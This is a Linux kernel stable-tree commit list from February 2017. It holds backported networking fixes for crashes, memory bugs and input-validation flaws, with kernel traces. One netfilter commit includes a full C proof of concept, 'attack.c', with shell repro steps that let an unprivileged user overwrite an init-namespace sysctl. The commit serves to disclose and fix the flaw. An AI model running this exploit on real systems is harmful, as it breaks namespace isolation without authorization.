1. 10 Feb, 2017 40 commits
    • Jeremy Linton's avatar
      net: sky2: Fix shutdown crash · c9dade91
      Jeremy Linton authored
      commit 06ba3b21 upstream.
      
      The sky2 frequently crashes during machine shutdown with:
      
      sky2_get_stats+0x60/0x3d8 [sky2]
      dev_get_stats+0x68/0xd8
      rtnl_fill_stats+0x54/0x140
      rtnl_fill_ifinfo+0x46c/0xc68
      rtmsg_ifinfo_build_skb+0x7c/0xf0
      rtmsg_ifinfo.part.22+0x3c/0x70
      rtmsg_ifinfo+0x50/0x5c
      netdev_state_change+0x4c/0x58
      linkwatch_do_dev+0x50/0x88
      __linkwatch_run_queue+0x104/0x1a4
      linkwatch_event+0x30/0x3c
      process_one_work+0x140/0x3e0
      worker_thread+0x60/0x44c
      kthread+0xdc/0xf0
      ret_from_fork+0x10/0x50
      
      This is caused by the sky2 being called after it has been shutdown.
      A previous thread about this can be found here:
      
      https://lkml.org/lkml/2016/4/12/410
      
      An alternative fix is to assure that IFF_UP gets cleared by
      calling dev_close() during shutdown. This is similar to what the
      bnx2/tg3/xgene and maybe others are doing to assure that the driver
      isn't being called following _shutdown().
      Signed-off-by: default avatarJeremy Linton <jeremy.linton@arm.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      c9dade91
    • Eli Cooper's avatar
      ipv4: Set skb->protocol properly for local output · 85801b79
      Eli Cooper authored
      commit f4180439 upstream.
      
      When xfrm is applied to TSO/GSO packets, it follows this path:
      
          xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()
      
      where skb_gso_segment() relies on skb->protocol to function properly.
      
      This patch sets skb->protocol to ETH_P_IP before dst_output() is called,
      fixing a bug where GSO packets sent through a sit tunnel are dropped
      when xfrm is involved.
      Signed-off-by: default avatarEli Cooper <elicooper@gmx.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      85801b79
    • Brian Norris's avatar
      mwifiex: printk() overflow with 32-byte SSIDs · 3cc6c6bd
      Brian Norris authored
      commit fcd2042e upstream.
      
      SSIDs aren't guaranteed to be 0-terminated. Let's cap the max length
      when we print them out.
      
      This can be easily noticed by connecting to a network with a 32-octet
      SSID:
      
      [ 3903.502925] mwifiex_pcie 0000:01:00.0: info: trying to associate to
      '0123456789abcdef0123456789abcdef <uninitialized mem>' bssid
      xx:xx:xx:xx:xx:xx
      
      Fixes: 5e6e3a92 ("wireless: mwifiex: initial commit for Marvell mwifiex driver")
      Signed-off-by: default avatarBrian Norris <briannorris@chromium.org>
      Acked-by: default avatarAmitkumar Karwar <akarwar@marvell.com>
      Signed-off-by: default avatarKalle Valo <kvalo@codeaurora.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      3cc6c6bd
    • Johannes Berg's avatar
      cfg80211: limit scan results cache size · 98db9446
      Johannes Berg authored
      commit 9853a55e upstream.
      
      It's possible to make scanning consume almost arbitrary amounts
      of memory, e.g. by sending beacon frames with random BSSIDs at
      high rates while somebody is scanning.
      
      Limit the number of BSS table entries we're willing to cache to
      1000, limiting maximum memory usage to maybe 4-5MB, but lower
      in practice - that would be the case for having both full-sized
      beacon and probe response frames for each entry; this seems not
      possible in practice, so a limit of 1000 entries will likely be
      closer to 0.5 MB.
      Signed-off-by: default avatarJohannes Berg <johannes.berg@intel.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      98db9446
    • Johannes Berg's avatar
      mac80211: discard multicast and 4-addr A-MSDUs · f862950d
      Johannes Berg authored
      commit ea720935 upstream.
      
      In mac80211, multicast A-MSDUs are accepted in many cases that
      they shouldn't be accepted in:
       * drop A-MSDUs with a multicast A1 (RA), as required by the
         spec in 9.11 (802.11-2012 version)
       * drop A-MSDUs with a 4-addr header, since the fourth address
         can't actually be useful for them; unless 4-address frame
         format is actually requested, even though the fourth address
         is still not useful in this case, but ignored
      
      Accepting the first case, in particular, is very problematic
      since it allows anyone else with possession of a GTK to send
      unicast frames encapsulated in a multicast A-MSDU, even when
      the AP has client isolation enabled.
      Signed-off-by: default avatarJohannes Berg <johannes.berg@intel.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      f862950d
    • Felix Fietkau's avatar
      mac80211: fix purging multicast PS buffer queue · 293573d9
      Felix Fietkau authored
      commit 6b07d9ca upstream.
      
      The code currently assumes that buffered multicast PS frames don't have
      a pending ACK frame for tx status reporting.
      However, hostapd sends a broadcast deauth frame on teardown for which tx
      status is requested. This can lead to the "Have pending ack frames"
      warning on module reload.
      Fix this by using ieee80211_free_txskb/ieee80211_purge_tx_queue.
      Signed-off-by: default avatarFelix Fietkau <nbd@nbd.name>
      Signed-off-by: default avatarJohannes Berg <johannes.berg@intel.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      293573d9
    • Stephen Suryaputra Lin's avatar
      ipv4: use new_gw for redirect neigh lookup · 3816ef44
      Stephen Suryaputra Lin authored
      commit 969447f2 upstream.
      
      In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
      and then the state of the neigh for the new_gw is checked. If the state
      isn't valid then the redirected route is deleted. This behavior is
      maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
      is assigned to peer->redirect_learned.a4 before calling
      ipv4_neigh_lookup().
      
      After commit 5943634f ("ipv4: Maintain redirect and PMTU info in
      struct rtable again."), ipv4_neigh_lookup() is performed without the
      rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
      isn't zero, the function uses it as the key. The neigh is most likely
      valid since the old_gw is the one that sends the ICMP redirect message.
      Then the new_gw is assigned to fib_nh_exception. The problem is: the
      new_gw ARP may never gets resolved and the traffic is blackholed.
      
      So, use the new_gw for neigh lookup.
      
      Changes from v1:
       - use __ipv4_neigh_lookup instead (per Eric Dumazet).
      
      Fixes: 5943634f ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
      Signed-off-by: default avatarStephen Suryaputra Lin <ssurya@ieee.org>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      3816ef44
    • WANG Cong's avatar
      neigh: check error pointer instead of NULL for ipv4_neigh_lookup() · 4d4c1fc6
      WANG Cong authored
      commit 2c1a4311 upstream.
      
      Fixes: commit f187bc6e ("ipv4: No need to set generic neighbour pointer")
      Cc: David S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarCong Wang <xiyou.wangcong@gmail.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      4d4c1fc6
    • Marcelo Ricardo Leitner's avatar
      sctp: assign assoc_id earlier in __sctp_connect · 5b97e5f3
      Marcelo Ricardo Leitner authored
      commit 7233bc84 upstream.
      
      sctp_wait_for_connect() currently already holds the asoc to keep it
      alive during the sleep, in case another thread release it. But Andrey
      Konovalov and Dmitry Vyukov reported an use-after-free in such
      situation.
      
      Problem is that __sctp_connect() doesn't get a ref on the asoc and will
      do a read on the asoc after calling sctp_wait_for_connect(), but by then
      another thread may have closed it and the _put on sctp_wait_for_connect
      will actually release it, causing the use-after-free.
      
      Fix is, instead of doing the read after waiting for the connect, do it
      before so, and avoid this issue as the socket is still locked by then.
      There should be no issue on returning the asoc id in case of failure as
      the application shouldn't trust on that number in such situations
      anyway.
      
      This issue doesn't exist in sctp_sendmsg() path.
      Reported-by: default avatarDmitry Vyukov <dvyukov@google.com>
      Reported-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Tested-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Signed-off-by: default avatarMarcelo Ricardo Leitner <marcelo.leitner@gmail.com>
      Reviewed-by: default avatarXin Long <lucien.xin@gmail.com>
      Acked-by: default avatarNeil Horman <nhorman@tuxdriver.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      5b97e5f3
    • Eric Dumazet's avatar
      dccp: fix out of bound access in dccp_v4_err() · 261def57
      Eric Dumazet authored
      commit 6706a97f upstream.
      
      dccp_v4_err() does not use pskb_may_pull() and might access garbage.
      
      We only need 4 bytes at the beginning of the DCCP header, like TCP,
      so the 8 bytes pulled in icmp_socket_deliver() are more than enough.
      
      This patch might allow to process more ICMP messages, as some routers
      are still limiting the size of reflected bytes to 28 (RFC 792), instead
      of extended lengths (RFC 1812 4.3.2.3)
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      261def57
    • Eric Dumazet's avatar
      dccp: do not send reset to already closed sockets · 7507bf35
      Eric Dumazet authored
      commit 346da62c upstream.
      
      Andrey reported following warning while fuzzing with syzkaller
      
      WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
      Kernel panic - not syncing: panic_on_warn set ...
      
      CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
      Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
       ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
       ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
       0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
      Call Trace:
       [<     inline     >] __dump_stack lib/dump_stack.c:15
       [<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
       [<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
       [<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
       [<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
       [<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
       [<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
       [<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
       [<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
       [<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
       [<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
       [<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
       [<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
       [<     inline     >] exit_task_work include/linux/task_work.h:21
       [<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
       [<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
       [<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
       [<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
       [<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130
      arch/x86/entry/common.c:156
       [<     inline     >] prepare_exit_to_usermode arch/x86/entry/common.c:190
       [<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0
      arch/x86/entry/common.c:259
       [<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
      Dumping ftrace buffer:
         (ftrace buffer empty)
      Kernel Offset: disabled
      
      Fix this the same way we did for TCP in commit 565b7b2d
      ("tcp: do not send reset to already closed sockets")
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Reported-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Tested-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      7507bf35
    • Eric Dumazet's avatar
      net: mangle zero checksum in skb_checksum_help() · 985f2772
      Eric Dumazet authored
      commit 4f2e4ad5 upstream.
      
      Sending zero checksum is ok for TCP, but not for UDP.
      
      UDPv6 receiver should by default drop a frame with a 0 checksum,
      and UDPv4 would not verify the checksum and might accept a corrupted
      packet.
      
      Simply replace such checksum by 0xffff, regardless of transport.
      
      This error was caught on SIT tunnels, but seems generic.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Cc: Maciej Żenczykowski <maze@google.com>
      Cc: Willem de Bruijn <willemb@google.com>
      Acked-by: default avatarMaciej Żenczykowski <maze@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      985f2772
    • Eric Dumazet's avatar
      net: clear sk_err_soft in sk_clone_lock() · 9385be2e
      Eric Dumazet authored
      commit e551c32d upstream.
      
      At accept() time, it is possible the parent has a non zero
      sk_err_soft, leftover from a prior error.
      
      Make sure we do not leave this value in the child, as it
      makes future getsockopt(SO_ERROR) calls quite unreliable.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Acked-by: default avatarSoheil Hassas Yeganeh <soheil@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      9385be2e
    • Marcelo Ricardo Leitner's avatar
      sctp: validate chunk len before actually using it · 0058a4c1
      Marcelo Ricardo Leitner authored
      commit bf911e98 upstream.
      
      Andrey Konovalov reported that KASAN detected that SCTP was using a slab
      beyond the boundaries. It was caused because when handling out of the
      blue packets in function sctp_sf_ootb() it was checking the chunk len
      only after already processing the first chunk, validating only for the
      2nd and subsequent ones.
      
      The fix is to just move the check upwards so it's also validated for the
      1st chunk.
      Reported-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Tested-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Signed-off-by: default avatarMarcelo Ricardo Leitner <marcelo.leitner@gmail.com>
      Reviewed-by: default avatarXin Long <lucien.xin@gmail.com>
      Acked-by: default avatarNeil Horman <nhorman@tuxdriver.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      0058a4c1
    • Jiri Slaby's avatar
      net: sctp, forbid negative length · 2b8ed05b
      Jiri Slaby authored
      commit a4b8e71b upstream.
      
      Most of getsockopt handlers in net/sctp/socket.c check len against
      sizeof some structure like:
              if (len < sizeof(int))
                      return -EINVAL;
      
      On the first look, the check seems to be correct. But since len is int
      and sizeof returns size_t, int gets promoted to unsigned size_t too. So
      the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is
      false.
      
      Fix this in sctp by explicitly checking len < 0 before any getsockopt
      handler is called.
      
      Note that sctp_getsockopt_events already handled the negative case.
      Since we added the < 0 check elsewhere, this one can be removed.
      
      If not checked, this is the result:
      UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
      shift exponent 52 is too large for 32-bit type 'int'
      CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
      Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
       0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
       ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
       0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
      Call Trace:
       [<ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
      ...
       [<ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
       [<ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
       [<ffffffffb2819a30>] ? __kmalloc+0x330/0x540
       [<ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
       [<ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
       [<ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
       [<ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      Cc: Vlad Yasevich <vyasevich@gmail.com>
      Cc: Neil Horman <nhorman@tuxdriver.com>
      Cc: "David S. Miller" <davem@davemloft.net>
      Cc: linux-sctp@vger.kernel.org
      Cc: netdev@vger.kernel.org
      Acked-by: default avatarNeil Horman <nhorman@tuxdriver.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      2b8ed05b
    • Anoob Soman's avatar
      packet: call fanout_release, while UNREGISTERING a netdev · 5e6212f7
      Anoob Soman authored
      commit 66644982 upstream.
      
      If a socket has FANOUT sockopt set, a new proto_hook is registered
      as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
      af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
      registered as part of fanout_add is not removed. Call fanout_release, on a
      NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
      fanout_list.
      
      This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()
      Signed-off-by: default avatarAnoob Soman <anoob.soman@citrix.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      5e6212f7
    • Nikolay Aleksandrov's avatar
      ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route · 2943dca4
      Nikolay Aleksandrov authored
      commit 2cf75070 upstream.
      
      Since the commit below the ipmr/ip6mr rtnl_unicast() code uses the portid
      instead of the previous dst_pid which was copied from in_skb's portid.
      Since the skb is new the portid is 0 at that point so the packets are sent
      to the kernel and we get scheduling while atomic or a deadlock (depending
      on where it happens) by trying to acquire rtnl two times.
      Also since this is RTM_GETROUTE, it can be triggered by a normal user.
      
      Here's the sleeping while atomic trace:
      [ 7858.212557] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:620
      [ 7858.212748] in_atomic(): 1, irqs_disabled(): 0, pid: 0, name: swapper/0
      [ 7858.212881] 2 locks held by swapper/0/0:
      [ 7858.213013]  #0:  (((&mrt->ipmr_expire_timer))){+.-...}, at: [<ffffffff810fbbf5>] call_timer_fn+0x5/0x350
      [ 7858.213422]  #1:  (mfc_unres_lock){+.....}, at: [<ffffffff8161e005>] ipmr_expire_process+0x25/0x130
      [ 7858.213807] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.8.0-rc7+ #179
      [ 7858.213934] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
      [ 7858.214108]  0000000000000000 ffff88005b403c50 ffffffff813a7804 0000000000000000
      [ 7858.214412]  ffffffff81a1338e ffff88005b403c78 ffffffff810a4a72 ffffffff81a1338e
      [ 7858.214716]  000000000000026c 0000000000000000 ffff88005b403ca8 ffffffff810a4b9f
      [ 7858.215251] Call Trace:
      [ 7858.215412]  <IRQ>  [<ffffffff813a7804>] dump_stack+0x85/0xc1
      [ 7858.215662]  [<ffffffff810a4a72>] ___might_sleep+0x192/0x250
      [ 7858.215868]  [<ffffffff810a4b9f>] __might_sleep+0x6f/0x100
      [ 7858.216072]  [<ffffffff8165bea3>] mutex_lock_nested+0x33/0x4d0
      [ 7858.216279]  [<ffffffff815a7a5f>] ? netlink_lookup+0x25f/0x460
      [ 7858.216487]  [<ffffffff8157474b>] rtnetlink_rcv+0x1b/0x40
      [ 7858.216687]  [<ffffffff815a9a0c>] netlink_unicast+0x19c/0x260
      [ 7858.216900]  [<ffffffff81573c70>] rtnl_unicast+0x20/0x30
      [ 7858.217128]  [<ffffffff8161cd39>] ipmr_destroy_unres+0xa9/0xf0
      [ 7858.217351]  [<ffffffff8161e06f>] ipmr_expire_process+0x8f/0x130
      [ 7858.217581]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
      [ 7858.217785]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
      [ 7858.217990]  [<ffffffff810fbc95>] call_timer_fn+0xa5/0x350
      [ 7858.218192]  [<ffffffff810fbbf5>] ? call_timer_fn+0x5/0x350
      [ 7858.218415]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
      [ 7858.218656]  [<ffffffff810fde10>] run_timer_softirq+0x260/0x640
      [ 7858.218865]  [<ffffffff8166379b>] ? __do_softirq+0xbb/0x54f
      [ 7858.219068]  [<ffffffff816637c8>] __do_softirq+0xe8/0x54f
      [ 7858.219269]  [<ffffffff8107a948>] irq_exit+0xb8/0xc0
      [ 7858.219463]  [<ffffffff81663452>] smp_apic_timer_interrupt+0x42/0x50
      [ 7858.219678]  [<ffffffff816625bc>] apic_timer_interrupt+0x8c/0xa0
      [ 7858.219897]  <EOI>  [<ffffffff81055f16>] ? native_safe_halt+0x6/0x10
      [ 7858.220165]  [<ffffffff810d64dd>] ? trace_hardirqs_on+0xd/0x10
      [ 7858.220373]  [<ffffffff810298e3>] default_idle+0x23/0x190
      [ 7858.220574]  [<ffffffff8102a20f>] arch_cpu_idle+0xf/0x20
      [ 7858.220790]  [<ffffffff810c9f8c>] default_idle_call+0x4c/0x60
      [ 7858.221016]  [<ffffffff810ca33b>] cpu_startup_entry+0x39b/0x4d0
      [ 7858.221257]  [<ffffffff8164f995>] rest_init+0x135/0x140
      [ 7858.221469]  [<ffffffff81f83014>] start_kernel+0x50e/0x51b
      [ 7858.221670]  [<ffffffff81f82120>] ? early_idt_handler_array+0x120/0x120
      [ 7858.221894]  [<ffffffff81f8243f>] x86_64_start_reservations+0x2a/0x2c
      [ 7858.222113]  [<ffffffff81f8257c>] x86_64_start_kernel+0x13b/0x14a
      
      Fixes: 2942e900 ("[RTNETLINK]: Use rtnl_unicast() for rtnetlink unicasts")
      Signed-off-by: default avatarNikolay Aleksandrov <nikolay@cumulusnetworks.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      2943dca4
    • Eric Dumazet's avatar
      net: avoid sk_forward_alloc overflows · 9864f153
      Eric Dumazet authored
      commit 20c64d5c upstream.
      
      A malicious TCP receiver, sending SACK, can force the sender to split
      skbs in write queue and increase its memory usage.
      
      Then, when socket is closed and its write queue purged, we might
      overflow sk_forward_alloc (It becomes negative)
      
      sk_mem_reclaim() does nothing in this case, and more than 2GB
      are leaked from TCP perspective (tcp_memory_allocated is not changed)
      
      Then warnings trigger from inet_sock_destruct() and
      sk_stream_kill_queues() seeing a not zero sk_forward_alloc
      
      All TCP stack can be stuck because TCP is under memory pressure.
      
      A simple fix is to preemptively reclaim from sk_mem_uncharge().
      
      This makes sure a socket wont have more than 2 MB forward allocated,
      after burst and idle period.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      9864f153
    • Eric Dumazet's avatar
      net: fix sk_mem_reclaim_partial() · a5b79829
      Eric Dumazet authored
      commit 1a24e04e upstream.
      
      sk_mem_reclaim_partial() goal is to ensure each socket has
      one SK_MEM_QUANTUM forward allocation. This is needed both for
      performance and better handling of memory pressure situations in
      follow up patches.
      
      SK_MEM_QUANTUM is currently a page, but might be reduced to 4096 bytes
      as some arches have 64KB pages.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      a5b79829
    • Oliver Hartkopp's avatar
      can: bcm: fix warning in bcm_connect/proc_register · 4c1307b2
      Oliver Hartkopp authored
      commit deb507f9 upstream.
      
      Andrey Konovalov reported an issue with proc_register in bcm.c.
      As suggested by Cong Wang this patch adds a lock_sock() protection and
      a check for unsuccessful proc_create_data() in bcm_connect().
      
      Reference: http://marc.info/?l=linux-netdev&m=147732648731237Reported-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Suggested-by: default avatarCong Wang <xiyou.wangcong@gmail.com>
      Signed-off-by: default avatarOliver Hartkopp <socketcan@hartkopp.net>
      Acked-by: default avatarCong Wang <xiyou.wangcong@gmail.com>
      Tested-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Signed-off-by: default avatarMarc Kleine-Budde <mkl@pengutronix.de>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      4c1307b2
    • Jann Horn's avatar
      netfilter: fix namespace handling in nf_log_proc_dostring · b53cc178
      Jann Horn authored
      commit dbb5918c upstream.
      
      nf_log_proc_dostring() used current's network namespace instead of the one
      corresponding to the sysctl file the write was performed on. Because the
      permission check happens at open time and the nf_log files in namespaces
      are accessible for the namespace owner, this can be abused by an
      unprivileged user to effectively write to the init namespace's nf_log
      sysctls.
      
      Stash the "struct net *" in extra2 - data and extra1 are already used.
      
      Repro code:
      
      #define _GNU_SOURCE
      #include <stdlib.h>
      #include <sched.h>
      #include <err.h>
      #include <sys/mount.h>
      #include <sys/types.h>
      #include <sys/wait.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <string.h>
      #include <stdio.h>
      
      char child_stack[1000000];
      
      uid_t outer_uid;
      gid_t outer_gid;
      int stolen_fd = -1;
      
      void writefile(char *path, char *buf) {
              int fd = open(path, O_WRONLY);
              if (fd == -1)
                      err(1, "unable to open thing");
              if (write(fd, buf, strlen(buf)) != strlen(buf))
                      err(1, "unable to write thing");
              close(fd);
      }
      
      int child_fn(void *p_) {
              if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                        NULL))
                      err(1, "mount");
      
              /* Yes, we need to set the maps for the net sysctls to recognize us
               * as namespace root.
               */
              char buf[1000];
              sprintf(buf, "0 %d 1\n", (int)outer_uid);
              writefile("/proc/1/uid_map", buf);
              writefile("/proc/1/setgroups", "deny");
              sprintf(buf, "0 %d 1\n", (int)outer_gid);
              writefile("/proc/1/gid_map", buf);
      
              stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
              if (stolen_fd == -1)
                      err(1, "open nf_log");
              return 0;
      }
      
      int main(void) {
              outer_uid = getuid();
              outer_gid = getgid();
      
              int child = clone(child_fn, child_stack + sizeof(child_stack),
                                CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                                |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
              if (child == -1)
                      err(1, "clone");
              int status;
              if (wait(&status) != child)
                      err(1, "wait");
              if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                      errx(1, "child exit status bad");
      
              char *data = "NONE";
              if (write(stolen_fd, data, strlen(data)) != strlen(data))
                      err(1, "write");
              return 0;
      }
      
      Repro:
      
      $ gcc -Wall -o attack attack.c -std=gnu99
      $ cat /proc/sys/net/netfilter/nf_log/2
      nf_log_ipv4
      $ ./attack
      $ cat /proc/sys/net/netfilter/nf_log/2
      NONE
      
      Because this looks like an issue with very low severity, I'm sending it to
      the public list directly.
      Signed-off-by: default avatarJann Horn <jann@thejh.net>
      Signed-off-by: default avatarPablo Neira Ayuso <pablo@netfilter.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      b53cc178
    • Stefan Richter's avatar
      firewire: net: fix fragmented datagram_size off-by-one · 3ca5f495
      Stefan Richter authored
      commit e9300a4b upstream.
      
      RFC 2734 defines the datagram_size field in fragment encapsulation
      headers thus:
      
          datagram_size:  The encoded size of the entire IP datagram.  The
          value of datagram_size [...] SHALL be one less than the value of
          Total Length in the datagram's IP header (see STD 5, RFC 791).
      
      Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got
      this field with a -/+1 offset:
      
          ether1394_tx() /* transmit */
              ether1394_encapsulate_prep()
                  hdr->ff.dg_size = dg_size - 1;
      
          ether1394_data_handler() /* receive */
              if (hdr->common.lf == ETH1394_HDR_LF_FF)
                  dg_size = hdr->ff.dg_size + 1;
              else
                  dg_size = hdr->sf.dg_size + 1;
      
      Likewise, I observe OS X 10.4 and Windows XP Pro SP3 to transmit 1500
      byte sized datagrams in fragments with datagram_size=1499 if link
      fragmentation is required.
      
      Only firewire-net sets and gets datagram_size without this offset.  The
      result is lacking interoperability of firewire-net with OS X, Windows
      XP, and presumably Linux' eth1394.  (I did not test with the latter.)
      For example, FTP data transfers to a Linux firewire-net box with max_rec
      smaller than the 1500 bytes MTU
        - from OS X fail entirely,
        - from Win XP start out with a bunch of fragmented datagrams which
          time out, then continue with unfragmented datagrams because Win XP
          temporarily reduces the MTU to 576 bytes.
      
      So let's fix firewire-net's datagram_size accessors.
      
      Note that firewire-net thereby loses interoperability with unpatched
      firewire-net, but only if link fragmentation is employed.  (This happens
      with large broadcast datagrams, and with large datagrams on several
      FireWire CardBus cards with smaller max_rec than equivalent PCI cards,
      and it can be worked around by setting a small enough MTU.)
      Signed-off-by: default avatarStefan Richter <stefanr@s5r6.in-berlin.de>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      3ca5f495
    • Stefan Richter's avatar
      firewire: net: guard against rx buffer overflows · 1d4353bd
      Stefan Richter authored
      commit 667121ac upstream.
      
      The IP-over-1394 driver firewire-net lacked input validation when
      handling incoming fragmented datagrams.  A maliciously formed fragment
      with a respectively large datagram_offset would cause a memcpy past the
      datagram buffer.
      
      So, drop any packets carrying a fragment with offset + length larger
      than datagram_size.
      
      In addition, ensure that
        - GASP header, unfragmented encapsulation header, or fragment
          encapsulation header actually exists before we access it,
        - the encapsulated datagram or fragment is of nonzero size.
      Reported-by: default avatarEyal Itkin <eyal.itkin@gmail.com>
      Reviewed-by: default avatarEyal Itkin <eyal.itkin@gmail.com>
      Fixes: CVE 2016-8633
      Signed-off-by: default avatarStefan Richter <stefanr@s5r6.in-berlin.de>
